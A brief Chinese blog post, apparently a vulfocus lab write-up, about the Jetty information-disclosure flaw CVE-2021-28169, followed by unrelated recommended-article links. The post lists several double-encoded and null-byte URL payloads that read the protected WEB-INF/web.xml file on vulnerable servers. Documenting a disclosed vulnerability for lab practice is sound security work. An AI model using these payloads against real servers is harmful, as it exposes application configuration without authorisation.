vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

payload:

http://ip:port后面加如下payload:

static?/%2557Eb-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

直接访问:

对W进行编码为 %2557,访问:static?/%2557EB-INF/web.xml

相关推荐
康小庄9 天前
Java阻塞队列——用法及常用场景
java·开发语言·数据库·spring boot·spring·jetty
lang201509281 个月前
Jetty密码混淆工具:安全还是假象?
安全·jetty
Mr.朱鹏1 个月前
Nginx路由转发案例实战
java·运维·spring boot·nginx·spring·intellij-idea·jetty
康小庄1 个月前
浅谈Java中的volatile关键字
java·开发语言·jvm·spring boot·spring·jetty
xiaoyustudiowww2 个月前
Jetty所有版本对应Servlet,Jsp,JVM,Protocols
java·jetty
老黄编程3 个月前
ros2 jazzy 支持 gazebo jetty 吗?兼容性如何?
ros2·jetty·jazzy
老黄编程3 个月前
Gazebo Jetty vs Gazebo Harmonic 差异性分析
ros·jetty·harmonic
Bonnie_12157 个月前
11-netty基础-手写rpc-支持多序列化协议-03
网络·网络协议·rpc·jetty
Bonnie_12157 个月前
13-netty基础-手写rpc-消费方生成代理-05
网络·网络协议·rpc·jetty
Bonnie_12157 个月前
04-netty基础-Reactor三种模型
java·nio·jetty